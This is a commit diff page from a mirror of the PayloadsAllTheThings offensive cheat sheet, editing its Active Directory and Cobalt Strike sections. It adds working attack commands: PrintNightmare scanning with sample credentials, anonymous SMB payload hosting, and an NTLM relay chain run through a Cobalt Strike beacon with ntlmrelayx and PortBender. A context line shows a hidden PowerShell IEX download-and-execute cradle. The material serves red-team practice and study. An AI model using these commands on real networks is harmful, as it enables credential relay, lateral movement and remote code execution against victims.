mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-20 10:18:50 +00:00
CS NTLM Relay
This commit is contained in:
parent
6cba7ceda9
commit
fde99044c5
@ -601,19 +601,20 @@ Requirements:
|
||||
**Detect the vulnerability**:
|
||||
* Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py)
|
||||
```ps1
|
||||
python3 ./rpcdump.py @10.0.2.10 | grep MS-RPRN
|
||||
python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR'
|
||||
Protocol: [MS-RPRN]: Print System Remote Protocol
|
||||
```
|
||||
* [It Was All A Dream](https://github.com/byt3bl33d3r/ItWasAllADream)
|
||||
```ps1
|
||||
git clone https://github.com/byt3bl33d3r/ItWasAllADream
|
||||
cd ItWasAllADream && poetry install && poetry shell
|
||||
itwasalladream -u user -p password -d domain 192.168.1.0/24
|
||||
itwasalladream -u user -p Password123 -d domain 10.10.10.10/24
|
||||
docker run -it itwasalladream -u username -p Password123 -d domain 10.10.10.10
|
||||
```
|
||||
|
||||
**Trigger the exploit**:
|
||||
|
||||
**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): `python3 ./smbserver.py share /tmp/smb/`
|
||||
**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): `python3 ./smbserver.py share /tmp/smb/` or using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) : `Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable`
|
||||
|
||||
* [SharpNightmare](https://github.com/cube0x0/CVE-2021-1675)
|
||||
```powershell
|
||||
@ -2873,4 +2874,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)
|
||||
* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/)
|
||||
* [Microsoft ADCS – Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/)
|
||||
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/)
|
||||
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/)
|
||||
* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/)
|
@ -1037,7 +1037,7 @@ Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted p
|
||||
|
||||
Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack.
|
||||
|
||||
## Azure AD Connect - Seamless Single Sign On Silver Ticket
|
||||
### Azure AD Connect - Seamless Single Sign On Silver Ticket
|
||||
|
||||
> Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA)
|
||||
|
||||
|
@ -37,6 +37,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
|
||||
* [Resource Kit](#resource-kit)
|
||||
* [Artifact Kit](#artifact-kit)
|
||||
* [Mimikatz Kit](#mimikatz-kit)
|
||||
* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
@ -169,6 +170,7 @@ $ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\d
|
||||
* Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles
|
||||
* Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2
|
||||
* Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles
|
||||
* SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint
|
||||
|
||||
```powershell
|
||||
set useragent "SOME AGENT"; # GOOD
|
||||
@ -472,6 +474,16 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
|
||||
* Load the mimikatz.cna aggressor script
|
||||
* Use mimikatz functions as normal
|
||||
|
||||
## NTLM Relaying via Cobalt Strike
|
||||
|
||||
```powershell
|
||||
beacon> socks 1080
|
||||
kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb://<IP_TARGET>
|
||||
beacon> rportfwd_local 8445 <IP_KALI> 445
|
||||
beacon> upload C:\Tools\PortBender\WinDivert64.sys
|
||||
beacon> PortBender redirect 445 8445
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI)
|
||||
@ -487,4 +499,5 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
|
||||
* [Cobalt Strike. Walkthrough for Red Teamers - Neil Lines - 15 Apr 2019](https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/)
|
||||
* [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/)
|
||||
* [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon)
|
||||
* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)
|
||||
* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)
|
||||
* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
|
Loading…
Reference in New Issue
Block a user